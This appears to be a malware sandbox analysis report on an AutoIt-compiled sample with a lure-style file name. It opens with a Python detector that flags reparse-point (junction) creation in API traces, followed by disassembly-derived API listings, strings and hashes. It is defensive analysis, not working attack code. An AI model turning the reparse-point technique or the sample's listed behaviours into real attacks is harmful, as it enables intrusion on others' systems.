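    """Decompose CTL_CODE(device, function, method, access) = device<<16 | access<<14 | function<<2 | method."""
    device, function, method = code >> 16, (code >> 2) & 0xFFF, code & 3
    name = FSCTL_FUNCTIONS.get(function) if device == FILE_DEVICE_FILE_SYSTEM else None
    return {"device": device, "function": function, "method": method, "name": name}


def find_reparse_point_creation(lines):
    """Detection over the listed calls: a CreateFileW that opens with FILE_FLAG_OPEN_REPARSE_POINT,
    followed by a DeviceIoControl carrying FSCTL_SET_REPARSE_POINT. Returns the finding or None."""
    open_call = None
    for rec in filter(None, map(parse_api_line, lines)):
        if rec["api"] == "CreateFileW" and len(rec["args"]) >= 6 and rec["args"][5] is not None:
            flags = names_for_mask(rec["args"][5], FILE_FLAGS)
            if "FILE_FLAG_OPEN_REPARSE_POINT" in flags:
                open_call = {
                    "create_ref": rec["ref"],
                    "access": names_for_mask(rec["args"][1] or 0, ACCESS_FLAGS),
                    "disposition": DISPOSITIONS.get(rec["args"][4]),
                    "flags": flags,
                }
        elif rec["api"] == "DeviceIoControl" and open_call and rec["args"][1] is not None:
            ctl = decode_ctl_code(rec["args"][1])
            if ctl["name"] == "FSCTL_SET_REPARSE_POINT":
                return dict(open_call, ioctl_ref=rec["ref"], fsctl=ctl["name"])
    return None


if __name__ == "__main__":
    # The "\??\%s" string in the same record is the NT-path form a mount-point
    # (junction) reparse buffer carries as its substitute name.
    print(find_reparse_point_creation(API_LINES))
```

Running it on the constructed lines reports the CreateFileW at 00A8A4FE (GENERIC_WRITE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT) paired with the DeviceIoControl at 00A8A58E decoding to FSCTL_SET_REPARSE_POINT; the same parser can be pointed at any other "APIs" block in this report, and the CTL_CODE decoder works for control codes the table does not name (it returns the device/function numbers with name None).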
                                                        APIs
                                                          • Part of subcall function 00A22612: GetWindowLongW.USER32(?,000000EB), ref: 00A22623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00AAC4EC
                                                        • GetFocus.USER32 ref: 00AAC4FC
                                                        • GetDlgCtrlID.USER32(00000000), ref: 00AAC507
                                                        • _memset.LIBCMT ref: 00AAC632
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00AAC65D
                                                        • GetMenuItemCount.USER32(?), ref: 00AAC67D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 00AAC690
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00AAC6C4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00AAC70C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AAC744
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00AAC779
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0
                                                        • API String ID: 1296962147-4108050209
                                                        • Opcode ID: 6ad56884a89b6e537e827cdab79f9ddf4c5ef8f948b685e9427bb7ff4eb5fa2b
                                                        • Instruction ID: a46286af207d0a7b55e86e63dbc2ad228d3d70376319d926ef49085a989a95f1
                                                        • Opcode Fuzzy Hash: 6ad56884a89b6e537e827cdab79f9ddf4c5ef8f948b685e9427bb7ff4eb5fa2b
                                                        • Instruction Fuzzy Hash: 7E819F70508352AFE724CF64C984A6BBBE4FB8A364F00492EF995972D1D730D905CFA2
                                                        APIs
                                                          • Part of subcall function 00A7874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A78766
                                                          • Part of subcall function 00A7874A: GetLastError.KERNEL32(?,00A7822A,?,?,?), ref: 00A78770
                                                          • Part of subcall function 00A7874A: GetProcessHeap.KERNEL32(00000008,?,?,00A7822A,?,?,?), ref: 00A7877F
                                                          • Part of subcall function 00A7874A: HeapAlloc.KERNEL32(00000000,?,00A7822A,?,?,?), ref: 00A78786
                                                          • Part of subcall function 00A7874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A7879D
                                                          • Part of subcall function 00A787E7: GetProcessHeap.KERNEL32(00000008,00A78240,00000000,00000000,?,00A78240,?), ref: 00A787F3
                                                          • Part of subcall function 00A787E7: HeapAlloc.KERNEL32(00000000,?,00A78240,?), ref: 00A787FA
                                                          • Part of subcall function 00A787E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A78240,?), ref: 00A7880B
                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A78458
                                                        • _memset.LIBCMT ref: 00A7846D
                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A7848C
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A7849D
                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00A784DA
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A784F6
                                                        • GetLengthSid.ADVAPI32(?), ref: 00A78513
                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A78522
                                                        • HeapAlloc.KERNEL32(00000000), ref: 00A78529
                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A7854A
                                                        • CopySid.ADVAPI32(00000000), ref: 00A78551
                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A78582
                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A785A8
                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A785BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                        • String ID:
                                                        • API String ID: 3996160137-0
                                                        • Opcode ID: 6517dba673d7d3ba53d1528558ed2a6edf495a9fc81ea92e5d8748dc474a8027
                                                        • Instruction ID: e0548311937cb090ca070cf6ff1c4b13c24ce9abc7175cfb116c736e6b001c14
                                                        • Opcode Fuzzy Hash: 6517dba673d7d3ba53d1528558ed2a6edf495a9fc81ea92e5d8748dc474a8027
                                                        • Instruction Fuzzy Hash: 2661597194020AAFDF14DFA0DC48AAEBBB9FF05300F14C129E919A6291EB359A05CF60
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00A976A2
                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00A976AE
                                                        • CreateCompatibleDC.GDI32(?), ref: 00A976BA
                                                        • SelectObject.GDI32(00000000,?), ref: 00A976C7
                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00A9771B
                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00A97757
                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00A9777B
                                                        • SelectObject.GDI32(00000006,?), ref: 00A97783
                                                        • DeleteObject.GDI32(?), ref: 00A9778C
                                                        • DeleteDC.GDI32(00000006), ref: 00A97793
                                                        • ReleaseDC.USER32(00000000,?), ref: 00A9779E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                        • String ID: (
                                                        • API String ID: 2598888154-3887548279
                                                        • Opcode ID: 91425b3063d6e0ef22b1812293aa45d69f70bee587aba70da0ad09438c6a0b66
                                                        • Instruction ID: 8022cbc718db04dfa557f9259cfa68563a32a6c10085f173a8888ea436f04730
                                                        • Opcode Fuzzy Hash: 91425b3063d6e0ef22b1812293aa45d69f70bee587aba70da0ad09438c6a0b66
                                                        • Instruction Fuzzy Hash: FB514875A04209EFCB15CFA8DC85EAEBBF9EF49310F14852DFA4A97250D731A8418B60
                                                        APIs
                                                        • LoadStringW.USER32(00000066,?,00000FFF,00AAFB78), ref: 00A8A0FC
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00A8A11E
                                                        • __swprintf.LIBCMT ref: 00A8A177
                                                        • __swprintf.LIBCMT ref: 00A8A190
                                                        • _wprintf.LIBCMT ref: 00A8A246
                                                        • _wprintf.LIBCMT ref: 00A8A264
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                        • API String ID: 311963372-2391861430
                                                        • Opcode ID: 1c4342047dbd6c7e148d365801b14d5b0019dc76dba8e48ba985010347f26c3a
                                                        • Instruction ID: 93fb8c0a42a125076f0a6c54a4d5153a58c977ebdb04ae2a1ec2b4e43a8bc6ac
                                                        • Opcode Fuzzy Hash: 1c4342047dbd6c7e148d365801b14d5b0019dc76dba8e48ba985010347f26c3a
                                                        • Instruction Fuzzy Hash: 5E51AB72900219BADF15EBE4DE86EEEB778AF14300F104566F505720A1EB316F48CB61
                                                        APIs
                                                        • timeGetTime.WINMM ref: 00A8521C
                                                          • Part of subcall function 00A40719: timeGetTime.WINMM(?,753DB400,00A30FF9), ref: 00A4071D
                                                        • Sleep.KERNEL32(0000000A), ref: 00A85248
                                                        • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00A8526C
                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00A8528E
                                                        • SetActiveWindow.USER32 ref: 00A852AD
                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00A852BB
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00A852DA
                                                        • Sleep.KERNEL32(000000FA), ref: 00A852E5
                                                        • IsWindow.USER32 ref: 00A852F1
                                                        • EndDialog.USER32(00000000), ref: 00A85302
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                        • String ID: @U=u$BUTTON
                                                        • API String ID: 1194449130-2582809321
                                                        • Opcode ID: 0917308f0004161ff9b96366836ffc0f5efdc48dc6007abea6befa8de39e01c4
                                                        • Instruction ID: 256dffe3b9f6c3d6b38e6848ec4149f7506434bc03a2faa352805756e779236c
                                                        • Opcode Fuzzy Hash: 0917308f0004161ff9b96366836ffc0f5efdc48dc6007abea6befa8de39e01c4
                                                        • Instruction Fuzzy Hash: AC219670904B46AFE704FBF0EDC9A793BA9EB56396F041424F902891B1DB719C439B71
                                                        APIs
                                                          • Part of subcall function 00A40B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A26C6C,?,00008000), ref: 00A40BB7
                                                          • Part of subcall function 00A248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A248A1,?,?,00A237C0,?), ref: 00A248CE
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A26D0D
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A26E5A
                                                          • Part of subcall function 00A259CD: _wcscpy.LIBCMT ref: 00A25A05
                                                          • Part of subcall function 00A4387D: _iswctype.LIBCMT ref: 00A43885
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                        • API String ID: 537147316-1018226102
                                                        • Opcode ID: b5d4d322936f448010f32b4cf29fd90f2294b9094c2cfe172697ee9d27b3c703
                                                        • Instruction ID: 2ee3ee844e879a9e98d95d4714f4a0813f40f91b5cae84401dbc93b943596a3c
                                                        • Opcode Fuzzy Hash: b5d4d322936f448010f32b4cf29fd90f2294b9094c2cfe172697ee9d27b3c703
                                                        • Instruction Fuzzy Hash: 5F02B2315083519FC714EF28DA81AAFBBF5BF99354F04492DF886972A1DB30DA49CB42
                                                        APIs
                                                        • _memset.LIBCMT ref: 00A245F9
                                                        • GetMenuItemCount.USER32(00AE6890), ref: 00A5D7CD
                                                        • GetMenuItemCount.USER32(00AE6890), ref: 00A5D87D
                                                        • GetCursorPos.USER32(?), ref: 00A5D8C1
                                                        • SetForegroundWindow.USER32(00000000), ref: 00A5D8CA
                                                        • TrackPopupMenuEx.USER32(00AE6890,00000000,?,00000000,00000000,00000000), ref: 00A5D8DD
                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A5D8E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                        • String ID:
                                                        • API String ID: 2751501086-0
                                                        • Opcode ID: c60ef947454722184b0aa505f75140006945d22b481cacbeecdc02d9388b8b61
                                                        • Instruction ID: 5afcd891f226276c299438b25673c65cf2fd8bd10d319fcd17dff3f5cb6586d7
                                                        • Opcode Fuzzy Hash: c60ef947454722184b0aa505f75140006945d22b481cacbeecdc02d9388b8b61
                                                        • Instruction Fuzzy Hash: 4E71F570641216BFEB34DF68DC85FAABF64FF09365F200226F915A61E1C7B16814DB90
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AA0038,?,?), ref: 00AA10BC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BuffCharUpper
                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                        • API String ID: 3964851224-909552448
                                                        • Opcode ID: e2f8dea56895eb1e3cbfac866c1dddc71bdb594754af7d31e96ab10cbcbad985
                                                        • Instruction ID: a21854f27c239650137ade8bcb03206cab8cc4cf6762fa27196330822c236662
                                                        • Opcode Fuzzy Hash: e2f8dea56895eb1e3cbfac866c1dddc71bdb594754af7d31e96ab10cbcbad985
                                                        • Instruction Fuzzy Hash: 72414A3455025AEFCF10EF94DA91EEE3724AF52340F104569FD925B291DB30AE1ACBA0
                                                        APIs
                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00AA77CD
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00AA77D4
                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00AA77E7
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00AA77EF
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00AA77FA
                                                        • DeleteDC.GDI32(00000000), ref: 00AA7803
                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00AA780D
                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00AA7821
                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00AA782D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                         • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                        • String ID: @U=u$static
                                                        • API String ID: 2559357485-3553413495
                                                        • Opcode ID: aa5c4322651f3c57ede47383884d4e0c6cc83e81a3d71acf6a7274cbc959a53b
                                                        • Instruction ID: db12953a414b541825fbdbe17f2eea3a2b8b91da42dd2c63d4e8985de5a52a1c
                                                        • Opcode Fuzzy Hash: aa5c4322651f3c57ede47383884d4e0c6cc83e81a3d71acf6a7274cbc959a53b
                                                        • Instruction Fuzzy Hash: CA315832105216AFDF159FA4DC08FEB3B69EF0E321F110224FA55A60E0DB359862DBA4
                                                        APIs
                                                          • Part of subcall function 00A27D2C: _memmove.LIBCMT ref: 00A27D66
                                                          • Part of subcall function 00A27A84: _memmove.LIBCMT ref: 00A27B0D
                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A855D2
                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A855E8
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A855F9
                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A8560B
                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A8561C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: SendString$_memmove
                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                        • API String ID: 2279737902-1007645807
                                                        • Opcode ID: 4c238b11dc92c5d83337ed94703222e1128a8f1a1e8bc4bc05fc52a34c7ce223
                                                        • Instruction ID: 7a1cda00f644a0a8d62bb25fc5a2a93a71ffc366c39d1c2138cdf55d797ab47d
                                                        • Opcode Fuzzy Hash: 4c238b11dc92c5d83337ed94703222e1128a8f1a1e8bc4bc05fc52a34c7ce223
                                                        • Instruction Fuzzy Hash: 5D119024D9016979D720B775DC4ADBF7A7DFFA1B00F44083AB802A60D1EA600E05C6A1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                        • String ID: 0.0.0.0
                                                        • API String ID: 208665112-3771769585
                                                        • Opcode ID: 26cd2e7195e10d4bfe5d13274de8432486ec7e3548eafc0039662424e959b1eb
                                                        • Instruction ID: dd1c8b4446f4e988c56246fcbef0953c7cee50365eda5e75fb8581cb33259d87
                                                        • Opcode Fuzzy Hash: 26cd2e7195e10d4bfe5d13274de8432486ec7e3548eafc0039662424e959b1eb
                                                        • Instruction Fuzzy Hash: 1D11D235904116AFCB34FBA4DD0AEDB77BCDF89720F4401B6F44996091EF749A8287A1
                                                        APIs
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        • CoInitialize.OLE32(00000000), ref: 00A8D855
                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A8D8E8
                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00A8D8FC
                                                        • CoCreateInstance.OLE32(00AB2D7C,00000000,00000001,00ADA89C,?), ref: 00A8D948
                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A8D9B7
                                                        • CoTaskMemFree.OLE32(?,?), ref: 00A8DA0F
                                                        • _memset.LIBCMT ref: 00A8DA4C
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00A8DA88
                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A8DAAB
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00A8DAB2
                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00A8DAE9
                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00A8DAEB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                        • String ID:
                                                        • API String ID: 1246142700-0
                                                        • Opcode ID: 58dabbd2c95b2197b609d43e859f21ea224adb3c3de2df204ef78cbafed5c2e3
                                                        • Instruction ID: e6695994f8e2e6c8a894a190f69dba37007a4e7adf24138dfedd1909e3b9e9dc
                                                        • Opcode Fuzzy Hash: 58dabbd2c95b2197b609d43e859f21ea224adb3c3de2df204ef78cbafed5c2e3
                                                        • Instruction Fuzzy Hash: 36B1FB75A00119AFDB04EFA8D988DAEBBB9FF49314F148469F509EB261DB30ED41CB50
                                                        APIs
                                                        • GetKeyboardState.USER32(?), ref: 00A805A7
                                                        • SetKeyboardState.USER32(?), ref: 00A80612
                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00A80632
